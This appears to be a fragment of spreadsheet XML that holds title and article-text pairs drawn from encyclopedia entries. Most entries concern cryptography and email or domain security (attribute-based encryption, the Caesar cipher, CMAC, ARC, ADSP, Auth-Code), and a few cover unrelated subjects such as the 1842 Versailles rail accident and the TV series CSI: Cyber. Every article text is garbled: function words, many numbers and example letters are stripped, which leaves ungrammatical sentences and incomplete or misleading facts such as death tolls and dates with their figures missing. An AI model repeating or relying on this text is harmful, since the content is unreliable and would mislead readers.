    <t>attribute-based encryption type public-key encryption secret user ciphertext dependent upon attributes (e.g. country live, kind subscription have). system, decryption ciphertext possible attributes user matches attributes ciphertext.a crucial security aspect attribute-based encryption collusion-resistance: adversary holds multiple keys able access data least individual grants access. history concept attribute-based encryption first proposed amit sahai brent waters later vipul goyal, omkant pandey, amit sahai brent waters. recently, several researchers proposed attribute-based encryption multiple authorities jointly generate users' private keys. types attribute-based encryption schemes there mainly types attribute-based encryption schemes: key-policy attribute-based encryption (kp-abe) ciphertext-policy attribute-based encryption (cp-abe).in kp-abe, users' secret keys generated based access tree defines privileges scope concerned user, data encrypted attributes. however, cp-abe uses access trees encrypt data users' secret keys generated attributes. relationship role-based encryption related concept role-based encryption refers exclusively access keys roles validated authoritative store roles. sense, role-based encryption expressed attribute-based encryption within limited context terms used interchangeably. role-based encryption cannot express attribute-based encryption. usage attribute-based encryption (abe) used encryption. instead encrypting part keys recipients, possible encrypt attributes match recipients' attributes. this primitive also used broadcast encryption order decrease number keys used. attribute-based encryption methods also widely employed vector-driven search engine interfaces. challenges although concept powerful promising mechanism, systems suffer mainly drawbacks: inefficiency lack straightforward attribute revocation mechanism. other main challenges are: coordination escrow revocation attribute revocation mechanism revocation users cryptosystems well-studied nontrivial problem. revocation even challenging attribute-based systems, given attribute possibly belongs multiple different users, whereas traditional systems public/private pairs uniquely associated single user. principle, system, attributes, users keys, revoked. following paragraph discusses revocation feature incorporated. simple constrained solution include time attribute. this solution would require message encrypted modified access tree constructed augmenting original access tree additional time attribute. time attribute, represents current ‘time period’. formally, access structure follows: {{{1}}}. example, ‘date’ attribute whose value changes every day. assumed non-revoked user receives fresh private keys corresponding ‘date’ attribute directly mobile server (which central authority) regional delegates. with hierarchical access structure, delegation property cp-abe exploited reduce dependency central authority issuing private keys users every time interval. there significant trade-offs extra load incurred authority generating communicating keys users amount time elapse revoked user effectively purged. this solution following problems: each user needs periodically receive central authority fresh private corresponding time attribute, otherwise able decrypt message. lazy revocation technique. revoked user purged system current time period expires. this scheme requires implicit time synchronization loose time synchronization sufficient) among authority users. other concepts called 'attribute-based encryption' manuscript juels michael szydlo dated 2004 proposed different, non-collusion-resistant notion attribute-based encryption. also id-based encryption references further reading attrapadung, nuttapong; herranz, javier; laguillaumie, fabien; libert, benoît; panafieu, elie; ràfols, carla (march 2012). "attribute-based encryption schemes constant-size ciphertexts". theoretical computer science. 422: 15–38. doi:10.1016/j.tcs.2011.12.004. herranz, javier; laguillaumie, fabien; ràfols, carla (2010), nguyen, phong pointcheval, david (eds.), "constant size ciphertexts threshold attribute-based encryption", public cryptography 2010, springer berlin heidelberg, 6056, 19–34, doi:10.1007/978-3-642-13013-7_2, isbn 978-3-642-13012-0, retrieved 2020-05-13</t>
  </si>
  <si>
    <t>Audrey Ruth Briggs</t>
  </si>
  <si>
    <t>audrey ruth briggs (1920–2005) cryptanalyst bletchley park second world war. background ruth briggs youngest daughter rev. canon george wallace briggs constance (née barrow). sisters brothers, whom, david, became headmaster king's college school, cambridge. graduated modern languages newnham college, cambridge 1942-1945, expert german, worked bletchley park member watch, translated decrypted messages. worked variously huts block a(n), naval section german cryptography.briggs's work recognised breaking codes used axis powers war. about bletchley park staff women female codebreakers recognised work.in 1946 married former officer major oliver churchill worcester cathedral father canon, three children, toby, simon, flora. references</t>
  </si>
  <si>
    <t>Caesar cipher</t>
  </si>
  <si>
    <t>cryptography, caesar cipher, also known caesar's cipher, shift cipher, caesar's code caesar shift, simplest widely known encryption techniques. type substitution cipher letter plaintext replaced letter fixed number positions alphabet. example, left shift would replaced would become method named julius caesar, used private correspondence.the encryption step performed caesar cipher often incorporated part complex schemes, vigenère cipher, still modern application rot13 system. single-alphabet substitution ciphers, caesar cipher easily broken modern practice offers essentially communications security. example transformation represented aligning alphabets; cipher alphabet plain alphabet rotated left right number positions. instance, caesar cipher using left rotation three places, equivalent right shift (the shift parameter used key): when encrypting, person looks letter message "plain" line writes corresponding letter "cipher" line. plaintext: quick brown jumps over lazy ciphertext: nrfzh yoltk grjmp lsbo ixwv deciphering done reverse, right shift encryption also represented using modular arithmetic first transforming letters numbers, according scheme, ..., encryption letter shift described mathematically {\displaystyle e_{n}(x)=(x+n)\mod {26}.} decryption performed similarly, {\displaystyle d_{n}(x)=(x-n)\mod {26}.} (there different definitions modulo operation. above, result range i.e., range subtract 26.) replacement remains throughout message, cipher classed type monoalphabetic substitution, opposed polyalphabetic substitution. history usage caesar cipher named julius caesar, who, according suetonius, used shift three becoming encrypting, becoming decrypting) protect messages military significance. while caesar's first recorded scheme, substitution ciphers known used earlier. anything confidential say, wrote cipher, changing order letters alphabet, word could made out. anyone wishes decipher these, meaning, must substitute fourth letter alphabet, namely others." nephew, augustus, also used cipher, right shift one, wrap around beginning alphabet: "whenever wrote cipher, wrote rest letters principle, using evidence exists julius caesar also used complicated systems, writer, aulus gellius, refers (now lost) treatise ciphers: "there even rather ingeniously written treatise grammarian probus concerning secret meaning letters composition caesar's epistles." unknown effective caesar cipher time, likely reasonably secure, least caesar's enemies would illiterate others would assumed messages written unknown foreign language. there record time techniques solution simple substitution ciphers. earliest surviving records date 9th-century works al-kindi arab world discovery frequency analysis.a caesar cipher shift used back mezuzah encrypt names god. this holdover earlier time jewish people allowed mezuzot. letters cryptogram comprise religiously significant "divine name" orthodox belief holds keeps forces evil check.in 19th century, personal advertisements section newspapers would sometimes used exchange messages encrypted using simple cipher schemes. kahn (1967) describes instances lovers engaging secret communications enciphered using caesar cipher times. even late 1915, caesar cipher use: russian army employed replacement complicated ciphers proved difficult troops master; german austrian cryptanalysts little difficulty decrypting messages. caesar ciphers found today children's toys secret decoder rings. caesar shift thirteen also performed rot13 algorithm, simple method obfuscating text widely found usenet used obscure text (such joke punchlines story spoilers), seriously used method encryption.the vigenère cipher uses caesar cipher different shift position text; value shift defined using repeating keyword. keyword long message, chosen random, never becomes known anyone else, never reused, one-time cipher, proven unbreakable. conditions difficult are, practical effect, never achieved. keywords shorter message (e.g., "complete victory" used confederacy american civil war), introduce cyclic pattern might detected statistically advanced version frequency analysis.in april 2006, fugitive mafia boss bernardo provenzano captured sicily partly messages, clumsily written variation caesar cipher, broken. provenzano's cipher used numbers, would written "4", "5", on.in 2011, rajib karim convicted united kingdom "terrorism offences" using caesar cipher communicate bangladeshi islamic activists discussing plots blow british airways planes disrupt networks. although parties access better encryption techniques (karim used data storage computer disks), chose scheme (implemented microsoft excel), rejecting sophisticated code program called mujahedeen secrets "because 'kaffirs', non-believers, know must less secure". this constituted application security obscurity. breaking cipher caesar cipher easily broken even ciphertext-only scenario. situations considered: attacker knows guesses) sort simple substitution cipher used, specifically caesar scheme; attacker knows caesar cipher use, know shift value.in first case, cipher broken using techniques general simple substitution cipher, frequency analysis pattern words. while solving, likely attacker quickly notice regularity solution deduce caesar cipher specific algorithm employed. second instance, breaking scheme even straightforward. since limited number possible shifts english), tested turn brute force attack. write snippet ciphertext table possible shifts technique sometimes known "completing plain component". example given ciphertext "exxegoexsrgi"; plaintext instantly recognisable shift four. another viewing method that, letter ciphertext, entire alphabet written reverse starting letter. this attack accelerated using strips prepared alphabet written reverse order. strips aligned form ciphertext along row, plaintext appear rows. another brute force approach match frequency distribution letters. graphing frequencies letters ciphertext, knowing expected distribution letters original language plaintext, human easily spot value shift looking displacement particular features graph. this known frequency analysis. example, english language plaintext frequencies letters (usually frequent), (typically least frequent) particularly distinctive. computers also measuring well actual frequency distribution matches expected distribution; example, chi-squared statistic used.for natural language plaintext, typically plausible decryption, although extremely short plaintexts, multiple candidates possible. example, ciphertext mpqy could, plausibly, decrypt either "aden" "know" (assuming plaintext english); similarly, "aliip" "dolls" "wheel"; "afccp" "jolly" "cheer" (see also unicity distance). with caesar cipher, encrypting text multiple times provides additional security. this encryptions say, shift shift equivalent single encryption shift mathematical terms, encryption operations possible forms group composition. also scytale notes bibliography bauer, decrypted secrets, edition, 2000, springer. isbn 3-540-66871-3. david kahn, codebreakers: story secret writing, revised 1996. isbn 0-684-83130-9. chris savarese brian hart, caesar cipher, 1999 external links weisstein, eric "caesar's method". mathworld.</t>
  </si>
  <si>
    <t>Auth-Code</t>
  </si>
  <si>
    <t>auth-code, also known code, authorization code, transfer code, auth-info code, generated passcode required transfer internet domain name domain registrars; code intended indicate domain name owner authorized transfer.auth-codes created current registrar domain. registrar required provide auth-code domain name owner within five calendar days owner's request, icann accepts complaints registrars not. some registrars allow auth-codes generated domain owners registrar's website. alternative systems domain registry uses eight-digit unique domain authentication identifier (udai) domain transfers name conflict procedures. udai provided domain owner domain's current registrar, expires days.the .co.uk domain registry, instead using passcode, domain owner specify registrar using registrar. destination registrar specified using destination's registrar tag, also known internet provider security (ips) nominet provider tag. also domain lock another attribute domain registration prevent unauthorized domain transfers domain name scams extensible provisioning protocol (epp) protocol used large number domain registries registrars communicate domain changes references</t>
  </si>
  <si>
    <t>Versailles rail accident</t>
  </si>
  <si>
    <t>1842, train crashed cutting meudon bellevue stations railway versailles paris, france. train travelling paris derailed leading locomotive broke axle, carriages behind piled caught fire. first french railway accident deadliest world time, causing deaths, including explorer jules dumont d'urville. accident french abandon practice locking passengers carriages. metal fatigue poorly understood time accident systematic research problem. derailment fire late afternoon sunday 1842, public celebrations held honour king louis philippe saint's gardens versailles finished many people wished return paris. 5:30 train left rive gauche versailles railway station paris montparnasse. over metres (390 long composed carriages hauled steam locomotives, train crowded, carrying passengers. travelling kilometres hour mph) bellevue meudon, axles leading locomotive snapped vehicle derailed, scattering contents fire-box. when second locomotive carriages continued derailed locomotive, carriages caught fire, trapping passengers. passengers locked compartments custom continental europe time.the fire intense number fatalities could determined, estimates varying 200, hundreds people seriously injured. among deaths explorer jules dumont d'urville family; remains identified sculptor cast made skull.: some religious groups said passengers punished travelling sunday. chapel named "notre-dame-des-flammes" (english: lady flames) built meudon memory victims; listed monument historique 1938, delisted 1959 demolished soon after. legacy this worst rail disaster world time. accident abandonment practice locking passengers carriages france. french government appointed commission investigate accident; recommended testing axles determine service life monitoring usage could replaced travelling safe distance.metal fatigue poorly understood time accident linked beginnings systematic research problem. work edwards, william rankine, william fairbairn others described fatigue process rankine developed solution railway axles. later, 1856 1870, work august wöhler would help improve testing axles, increase axle life. notes references citations sources further reading lewis, peter nisbet, alistair (2008). wheels disaster!: oxford train wreck christmas eve, 1874. tempus. isbn 978-0-7524-4512-0. louis eugène robert (1843). histoire description naturelle commune meudon french). paulin. 110–144. retrieved october 2012. external links media related versailles rail accident wikimedia commons</t>
  </si>
  <si>
    <t>Authenticated Identity Body</t>
  </si>
  <si>
    <t>authenticated identity body method allowing parties network share authenticated identity thereby increasing integrity communications. aibs extend authentication methods like s/mime provide specific mechanism introduce integrity transmissions. parties transmitting aibs cryptographically sign subset message headers, signatures assert message originator's identity. meet requirements reference integrity (for example defending replay attacks) additional message headers 'date' 'contact' optionally included aib. described discussed 3893: "for reasons end-to-end privacy, also desirable encrypt aibs [...]. while encryption aibs entails holder specific decrypt body, single could distributed throughout network hosts exist common policies. security therefore predicated secure distribution key. however, networks federations trusted hosts common policy), widespread distribution decryption could appropriate. some telephone networks, example, might require model. when encrypted, encrypted signed... unless, course, signed mrs. rin, va." also 3893</t>
  </si>
  <si>
    <t>Authenticated Received Chain</t>
  </si>
  <si>
    <t>authenticated received chain (arc) email authentication system designed allow intermediate mail server like mailing list forwarding service sign email's original authentication results. this allows receiving service validate email email's dkim records rendered invalid intermediate server's processing.arc defined 8617, published july 2019, "experimental". overview dmarc allows sender's domain indicate emails protected and/or dkim, tells receiving service neither authentication methods passes reject message. however, strict dmarc policy block legitimate emails sent mailing list forwarder, dkim signature invalidated message modified, adding subject footer, check either fail forwarder change bounce address) aligned mailing list domain message author's domain (unless mailing list rewrites from: header field.) devised solve problem giving intermediate servers sign original message's validation results. even dkim validation fail, receiving service choose validate chain. indicates original message passed dkim checks, modifications made intermediaries trusted receiving service, receiving service choose accept email. validating chain makes sense receiver trusts signers. fact, chain counterfeited, processing applies receivers trust good faith signers, much filtering practices. implementation defines three mail headers: arc-authentication-results (abbreviated aar) combination instance number results spf, dkim, dmarc validation arc-seal (abbreviated combination instance number (i), dkim-like signature previous arc-seal headers, validity prior entries. arc-message-signature (abbreviated ams) combination instance number dkim-like signature entire message except arc-seal headersto sign modification, intermediate server performs following steps: copies "authentication-results" field field (starting i=1) prepends message. calculates message (with aar) prepends message. calculates previous arc-seal headers prepends message.to validate arc, recipient performs following steps: validates chain arc-seal headers missing entries, arc-seal messages state prior entries valid, etc.) validates newest arc-message-signature (based instance number) references external links specification email</t>
  </si>
  <si>
    <t>Vertcoin</t>
  </si>
  <si>
    <t>vertcoin (vtc) open-source cryptocurrency created early 2014 focuses decentralization. vertcoin uses asic resistant proof-of-work mechanism issue coins incentivize miners secure network validate transactions. vertcoin's blockchain maintained decentralized coalition individuals collectively mining using modern graphics cards. history vertcoin aims decentralized difficult mine using dedicated processors, known asics. vertcoin open source 2.5-minute block time.techradar's jonas muro wrote 2018 reasons among others made vertcoin "popula[r]". reason little friction users "one-click software" mine. another reason people involved vertcoin social media. news's popken noted 2018 vertcoin received significant attention reddit "soaring popularity last year" owing impervious specialized machines known asics similarly used heavy influence bitcoin. though december 2018 paper published transactions korean institute electrical engineers said "because [vertcoin] popular blockchain, difficulty adjustment algorithm sensitive hashrate change, making easy target timestamp spoofing cherry picking attack."from october december 2018, vertcoin suffered attacks.in response, vertcoin changed proof-of-work algorithm lyra2rev3 suffering another attack december 2019.in january 2021 proof-of-work algorithm called verthash deployed bringing enhanced network security asic miners. references external links official website</t>
  </si>
  <si>
    <t>Vidalia (software)</t>
  </si>
  <si>
    <t>vidalia discontinued cross-platform controlling tor, built using name comes vidalia onion since uses onion routing. allows user start, stop view status tor, view, filter search messages, monitor bandwidth usage, configure aspects tor. vidalia also makes easier contribute network optionally helping user relay. another prominent feature vidalia network map, lets user geographic location relays network, well user's application traffic going. vidalia released general public license. runs platform supported 4.2, including windows, linux unix-like variants using window system. vidalia longer maintained supported, developers recommend anymore. 2013 replaced firefox-based controller called launcher. also anonymizing relay monitor (arm) references</t>
  </si>
  <si>
    <t>CSI: Cyber</t>
  </si>
  <si>
    <t>csi: cyber (crime scene investigation: cyber) american police procedural drama television series premiered march 2015, cbs. series, starring patricia arquette danson, third spin-off csi: crime scene investigation fourth series franchise. 2016, canceled series seasons. plot series follows elite team special agents tasked investigating cyber crimes north america. based washington, d.c., team supervised deputy director avery ryan, esteemed ph.d. ryan behavioral psychologist turned "cyber shrink" established cyber crime division heads "hack-for-good" program, scheme criminals catches work lieu receiving prison sentence. ryan works d.b. russell, left-coast sherlock holmes career crime scene investigator joins team stint director vegas crime lab. together, russell ryan head team including elijah mundo, daniel krumitz (aka krummy), raven ramirez, brody nelson, work solve internet-related murders, cyber theft, hacking, sexual offenses, blackmail, crime deemed cyber-related within fbi's jurisdiction. cast characters main patricia arquette avery ryan, deputy director fbi. avery renowned psychologist york professional database hacked, resulting death patient. this, coupled recent death daughter, avery leave york, found fbi's cyber crime division. special agent charge, avery heads team former cyber criminals federal agents travel nationwide search criminals work dark net. after several years working simon sifter, ryan promoted deputy director fbi. following death daughter, ryan divorced husband, though later reconnect begin romantic relationship. following dissolution hack-for-good program, avery begins recruiting young hackers work within ctoc (cyber threat operations center). james beek elijah mundo, senior field agent. assigned ryan's cyber division, mundo former u.s. marine, expert battlefield forensics, weaponry, vehicles, bombs. after short separation wife, elijah filed divorce, though since reconciled. avid gamer, aware dangers lurk internet. field agent, mundo much hands counterparts detaining interviewing suspects. during second season, mundo's father diagnosed cancer, causing confide barmaid later begins stalking him. "legacy", shot killed russell. elijah daughter. peter macnicol simon sifter (season assistant deputy director. simon works headquarters washington oversees ryan cyber division. working ranks investigating homicides, drive-bys, gang warfare, sifter built array contacts connections invaluable fbi. often acts clearinghouse cyber intergovernmental counterparts. married least child. sometime following first season, sifter vacated position. shad moss brody nelson, analyst. brody former black hacker caught later recruited cyber part ryan's "hack-for-good" program. after avoiding prison sentence fbi's behest, team initially dubious brody's intentions. after struggling sever ties world cyber crime, nelson outs hacking community proves loyal valued analyst. team nicknamed "baby-face". shown arachnophobic. during season two, nelson discovers obtained evidence illegally, conviction overturned. later undergoes training quantico, returns cyber agent. charley koontz daniel krumitz, special agent. daniel notes desire join enforcement began parents murdered. skilled analyst (avery claims best white hacker world), also brutally honest. quick-witted introvert specializes technology, though also trained field agent. sister, named francine, strong bonds nelson ryan. krumitz often referred nickname "krummy". hayley kiyoko raven ramirez, analyst. raven, like nelson, former black hacker recruited ryan part "hack-for-good" program. start first season, years, become specialist social media investigations, international relations cyber trends. raven stated that, victim cyber-bullying, turned hacking refuge tormentors. raven trusted member team. hacker alias eclipse. after avery's hack-for-good program dissolved, raven awarded time-served, thus spared prison. later rejoins consultant specialist. danson d.b. russell (season director next generation cyber forensics. d.b. described "left-coast sherlock holmes", hippies keen forensic botanist. trained crime scene investigator, russell joins cyber following four-year stint director vegas crime looking fresh start following divorce death "soulmate" julie finlay. avery jokes offered russell selection leaves often mocks characteristics. russell four children granddaughter and, since joining cyber, expressed interest dating, formed close bonds daniel krumitz brody nelson. russell later begins relationship greer latimore, tenders resignation order move paris. during series finale, shot, recovers injuries. recurring brent sexton andrew michaels, avery's ex-husband. andrew married young daughter. following loss child, separated. season finale, notes seen avery since joined fbi. during season two, reconnects ryan hacker files false death certificate name. despite engaged another woman, avery begin romantic relationship again. kelly preston greer latimore, former secret service agent turned private investigator. greer first becomes known cyber team d.b. meets bar. they later begin romantic relationship and, greer offered paris, d.b. tenders resignation. michael irby david ortega, u.s. naval captain. david medical doctor stationed washington, often seen assisting avery ryan's team's investigations. trained medical examiner. angela trimbur francine krumitz, daniel's sister. francine hung death parents. although initially better hiding brother, later shoots kills parents' murderer. mckenna grace michelle mundo, elijah's daughter. referred "mitchie" family, michelle currently lives mother devon, though maintains strong relationship elijah. initially focus custody dispute. alexie gilmore devon atwood, elijah's wife. devon elijah had, first season, recently separated. still much love elijah, her. decide reconcile romance, keep secret daughter. marcus giamatti artie sneed, quirky amateur technology expert occasionally helps cyber unit cases. sean blakemore director marcus silver, avery's boss. diogo morgado miguel vega: interpol agent, avery's friend, helped team stop python. episodes introductory episodes season (2015) first season csi: cyber headlined patricia arquette, special agent avery ryan. james beek, peter macnicol, shad moss, charley koontz, hayley kiyoko also star. season (2015–16) second season csi: cyber headlined patricia arquette, deputy director avery ryan, danson director d.b. russell. james beek, shad moss, charley koontz, hayley kiyoko also star. production development february 2014, announced plans launch spin-off franchise titled csi: cyber. deadline.com reported series would focus cyber investigations, opposed forensic investigations seen csi, csi: miami, csi: stating "[anthony zuiker forefront entertainment’s digital conversion, experimenting arena past decade." zuiker, wrote digi-novel level spent time washington meeting cia, fbi, part research 2009 project cyber crimes (which picked series likely inspired csi: cyber). announced series would based work producer mary aiken, pioneering cyber psychologist. pilot episode penned zuiker, carol mendelsohn, donahue, aired april 2014. announced officially picked series 2014. first season, comprising episodes, premiered march 2015. second final season consisted episodes. series executive produced creators carol mendelsohn, anthony zuiker, donahue, former csi: executive producer veasey (who acts showrunner), jonathan littman, jerry bruckheimer. mary aiken, show based, attached series producer. peter macnicol departed main cast first season, whilst announced 2015, csi: cyber renewed second season. june 2015, moss confirmed interview project season would include episodes. season reduced episodes, ending episode titled "legacy". casting march 2014, patricia arquette cast special agent avery ryan spring episode csi. ryan described "tasked solving high octane crimes start cyber world play real life". charley koontz next actor cast, playing character named daniel krummitz, agent rarely, ever, goes home". peter macnicol joined cast august 2014, assistant director stavros sifter, shrewd savvy networker; charmer hint malice". koontz macnicol's characters later renamed daniel krumitz simon sifter, respectively. these announcements swiftly followed casting james beek male lead, role elijah mundo. mundo described expert battlefield forensics recruited patricia arquette’s character". shad moss announced casting august 2014, instagram account. later confirmed playing "baby face" nelson. rounding original cast hayley kiyoko raven ramirez, described character "will possess dark secret front story ryan won’t even know it’s late". kiyoko cast october 2014.following cancellation csi: crime scene investigation, announced danson would joining cyber cast d.b. russell, newly appointed director next generation cyber forensics. filming csi: cyber's primary photography takes place cbs' studio center angeles, california neighborhood studio city. numerous outdoor scenes filmed locally angeles area, including matteo street, spring street, main street, arroyo seco, colorado street bridge. music series' theme song miles" who, series' music composers jeff russo decter. songs featured throughout first season include: "thunderbolt" justin prime sidney samson (episode "take ride" rattle (episode "re-creation" strikez (episode "with underglow (episode "five foot two, eyes blue" landry orchestra (episode "get your hands uforik (episode "let tonight" foxes (episode 10), "how sweet loved you)" marvin gaye (episode 12). second season features music underglow ("save day", episode with lions ("jitterbug", episode savoy ("pump up", episode motabeatz ("watch your back", episode show also features additional music electronic music producer nick chiari, produces alias grabbitz. reception ratings critical response first season csi: cyber received mixed reviews. rotten tomatoes, season rating 35%, based reviews, average rating 5.1/10. site's critical consensus reads, "while stocked impressive talent, csi: cyber fails anything truly franchise, settling slightly modernized twist typical crimefighting scenarios." metacritic, season score 100, based critics, indicating "mixed average reviews". world record producers announced intentions break guinness world record largest ever simulcast drama march 2015, episode "kitty" airing countries addition digital streaming. they succeeded breaking record airing csi: cyber's backdoor pilot countries. international broadcast series sold channel united kingdom, canada, italy, network australia, prime zealand, rté2 ireland, france, asia latin america, netherlands, nova bulgaria, skai greece, zone israel, estonia, kanal sweden denmark, mtv3 finland. home video releases references external links official website csi: cyber imdb</t>
  </si>
  <si>
    <t>CRM114 (program)</t>
  </si>
  <si>
    <t>crm114 (full name: "the crm114 discriminator") program based upon statistical approach classifying data, especially used filtering email spam. origin name name comes crm-114 discriminator stanley kubrick movie strangelove piece radio equipment designed filter messages lacking specific code-prefix. operation while others done statistical bayesian spam filtering based upon frequency single word occurrences email, crm114 achieves higher rate spam recognition creating hits based upon phrases five words length. these phrases used form markov random field representing incoming texts. with additional contextual recognition, accurate spam filters available. initial testing 2002 author bill yerazunis gave 99.87% accuracy; holden trec 2005 2006 gave results better 99%, significant variation depending particular corpus. crm114's classifier also switched littlestone's winnow algorithm, character-by-character correlation, variant (k-nearest neighbor algorithm) classification called hyperspace, bit-entropic classifier uses entropy encoding determine similarity, svm, mutual compressibility calculated modified lz77 algorithm, experimental classifiers. actual features matched based generalization skip-grams. crm114 algorithms multi-lingual (compatible utf-8 encodings) null-safe. voting crm114 classifiers demonstrated detect confidential versus non-confidential documents written japanese better 99.9% detection rate 5.3% false alarm rate.crm114 good example pattern recognition software, demonstrating machine learning accomplished reasonably simple algorithm. program's source code available gpl. deeper level, crm114 also string pattern matching language, similar grep even perl; although turing complete highly tuned matching text, even simple (recursive) definition factorial takes almost lines. part crm114 language syntax positional, declensional. programming language, used many applications aside detecting spam. crm114 uses approximate-match regex engine, possible write programs depend absolutely identical strings matching function correctly. crm114 applied email filtering kmail client number applications, including detection bots twitter yahoo, well first-level filter dept transportation's vehicle defect detection system. also used predictive method classifying fault-prone software modules. also string matching references external links crm114 home page sourceforge approximate regex matcher homepage</t>
  </si>
  <si>
    <t>Author Domain Signing Practices</t>
  </si>
  <si>
    <t>computing, author domain signing practices (adsp) optional extension dkim e-mail authentication scheme, whereby domain publish signing practices adopts relaying mail behalf associated authors. adsp adopted standards track 5617 august 2009, declared "historic" november 2013 "...almost deployment years since..." concepts author address author address specified from header field defined 5322. unusual cases address defined field, 5322 provides sender field used instead. domains 5322-from addresses necessarily elaborated purported responsible address covered sender specified 4407. domain 5322-from address also necessarily envelope sender address defined 5321, also known smtp mail from, envelope-from, 5321-from, return-path, optionally protected specified 7208. author domain signature author domain signature valid dkim signature domain name dkim signing entity, i.e., dkim-signature header field, domain name author address. this binding recognizes higher value author domain signatures valid signatures happen found message. fact, proves entity controls zone author hence also destination replies message's author relayed author's message. most likely, author submitted message proper message submission agent. such message qualification verified independently published domain signing practice. author domain signing practices practices published record author domain. author address john.doe@example.com, _adsp._domainkey.example.com. "dkim=unknown" three possible signing practices provided for: unknown, defining record, says domain might sign some, most, email, says mail domain signed author domain signature, discardable says mail domain signed author domain signature; furthermore, signature missing invalid, domain owners want receiving server drop message; silently throw away. caveat adsp specification explicitly discourages publishing record different "unknown" domains independent users usage policy explicitly restrict sending mail designated mail servers, since mail sent independently organization signed.however explicitly caveat worded, straightforward understand purpose limitations adsp. adsp's authors holds better publish private lists discardable domains, maintained competent people, rather letting domain state policy. recognizing spec shipped untested prototype, author popular adsp implementation proposed downgrade adsp experimental status. later actually downgraded historical. consideration dmarc covers less case influential, tied history time adsp known (author signing practices), original (sender signing practices), protocol naming poll.domainkeys, dkim's predecessor, outbound signing policy consisting single character, domain signs email, otherwise. dkim intentionally avoided signers' policies considerations, dkim validate message's "from" field directly, policy-neutral authentication protocol. association signer right "from", field visible users, deferred separate specification.eric allman, author sendmail, editor adsp specification ietf dkim working group. draft adsp specification started june 2007 went revisions lengthy discussion published august 2009 declared "historic" four years later november 2013 "...almost deployment years since..." also dkim dmarc smtp phishing e-mail authentication references external links domainkeys identified mail (dkim) author domain signing practices (adsp) ietf dkim working group (started 2006) domain keys identified mail (dkim)</t>
  </si>
  <si>
    <t>CMAC</t>
  </si>
  <si>
    <t>one-key (omac) message authentication code constructed block cipher much like cbc-mac algorithm. officially omac algorithms (omac1 omac2) essentially except small tweak. omac1 equivalent cmac, became nist recommendation 2005. free uses: covered patents. cryptography, cmac block cipher-based message authentication code algorithm. used provide assurance authenticity and, hence, integrity data. this mode operation fixes security deficiencies cbc-mac (cbc-mac secure fixed-length messages).the core cmac algorithm variation cbc-mac black rogaway proposed analyzed name xcbc submitted nist. xcbc algorithm efficiently addresses security deficiencies cbc-mac, requires three keys. iwata kurosawa proposed improvement xcbc named resulting algorithm one-key cbc-mac (omac) papers. they later submitted omac1, refinement omac, additional security analysis. omac algorithm reduces amount material required xcbc. cmac equivalent omac1. generate ℓ-bit cmac message using b-bit block cipher secret (k), first generates b-bit sub-keys using following algorithm (this equivalent multiplication finite field gf(2b)). denote standard left-shift operator denote bit-wise exclusive calculate temporary value ek(0). msb(k0) else certain constant depends (specifically, non-leading coefficients lexicographically first irreducible degree-b binary polynomial minimal number ones: 0x1b 64-bit, 0x87 128-bit, 0x425 256-bit blocks.) msb(k1) else return keys (k1, generation process.as small example, suppose 00112, ek(0) 01012. then 10102 0100 0011 01112. cmac generation process follows: divide message b-bit blocks mn−1 ..., mn−1 complete blocks. (the empty message treated incomplete block.) complete block else 10...02). 00...02. ..., calculate ek(ci−1 mi). ek(cn−1 mn′) output msbℓ(cn).the verification process follows: algorithm generate tag. check generated equal received tag. implementations python implementation: usage aes_cmac() function "impacket/blob/master/tests/misc/test_crypto.py", definition "impacket/blob/master/impacket/crypto.py" ruby implementation references external links 4493 aes-cmac algorithm 4494 aes-cmac-96 algorithm ipsec 4615 advanced encryption standard-cipher-based message authentication code-pseudo-random function-128 (aes-cmac-prf-128) omac online test more information omac rust implementation</t>
  </si>
  <si>
    <t>CJCSG</t>
  </si>
  <si>
    <t>cryptography, cjcsg stream cypher algorithm developed cees jansen alexander kolosha. submitted estream project ecrypt network. classified archival algorithm considered.</t>
  </si>
  <si>
    <t>Vietnamese airports hackings</t>
  </si>
  <si>
    <t>july 2016, group suspected coming china launched hacker attacks website vietnam airlines client information leaked flight information screens vietnam's biggest airports, nhat international airport international airport, posting derogatory messages vietnam philippines territorial china south china sea. background july 2016, permanent court arbitration ruled favor philippines china arbitration case concerning disputes south china sea; major ruling, tribunal ruled china historical rights" based "nine-dash line" map. within hours permanent court arbitration's unanimous rebuke china's territorial claims south china last week, least national local government websites philippines knocked offline massive distributed denial service (ddos) attack.this hack comes days involving chinese tourist hacked airports, nhat international airport. chinese visitor complained, passport handed back obscenities written page contains including china's "nine-dash line", marks china's claim territories south china sea. incidents according civil aviation administration vietnam, 13h46 july it-systems vietjet, vietnam airlines flight check-ins nhat international airport attacked stop working. 16h07', team self-proclaimed chinese hackers attacked flight information screens international airport, posting notices state media said criticized philippines vietnam claims south china sea., hackers also took control speaker system airport minutes, speakers broadcast male voice distorting viet nam's claims east english. check-ins system vietnam airlines also attacked switch manual procedure completion, lead flight delays. altogether, airport flight, nhat flight delayed hour, affect 2.000 passengers.the official website vietnam airlines, vietnamairlines.com, also hacked group day. website page replaced picture appeared airports’ screens. website back normal 18.30pm, however, airlines’ customer database stolen made public internet, according press release vietnam airlines. airlines advised members change account passwords soon network system recovered.another webpages also compromised, webpage vietnam football federation national economics university (vietnam) next day.on next day, computers check again, flight information screens still airport. speaker system also still working again. nhat airport situation similar flight information screens speaker system. perpetrators hackers claimed 1937cn china, biggest hacker groups country history hacking viet nam's philippines’ websites 2013 2015, respectively. references</t>
  </si>
  <si>
    <t>British Tabulating Machine Company</t>
  </si>
  <si>
    <t>british tabulating machine company (btm) firm manufactured sold hollerith unit record equipment data-processing equipment. during world constructed "bombes", machines used bletchley park break german enigma machine ciphers. company formed 1902 tabulator limited, robert porter obtained rights sell herman hollerith's patented machines tabulating machine company (later become ibm). 1909, company renamed "british tabulating machine company limited". 1920, company moved london letchworth, hertfordshire; also point started manufacturing machines, rather simply reselling hollerith equipment. annual revenues 1915, £122k 1925, £170k 1937. 1916 staff; increased 1922, 1929 1225 1939. return exclusive right market hollerith equipment britain empire (excluding canada), paid revenues american company royalties. this became ever-increasing burden years progressed; attempted renegotiate agreement several occasions, finally terminated 1948. during world called upon design manufacture machine assist breaking german enigma machine ciphers. this machine, known bombe, initially conceived alan turing, actual machine designed chief engineer harold 'doc' keen, company's engineering department throughout 1930s. project codenamed "cantab". project managed computing pioneer dora metcalf 1942. european war, hundred bombes built installed. computer built valve based computer called (hollerith electronic computer). first model (hec built 1951, example held birmingham museum. went develop models, eventually building 100. machines kilobyte drum memory 1000 valves, could punched cards input output, drive printer. merger 1959 merged former rival powers-samas become international computers tabulators limited (ict). later became part (international computers limited), later taken fujitsu. references john harper, british tabulating 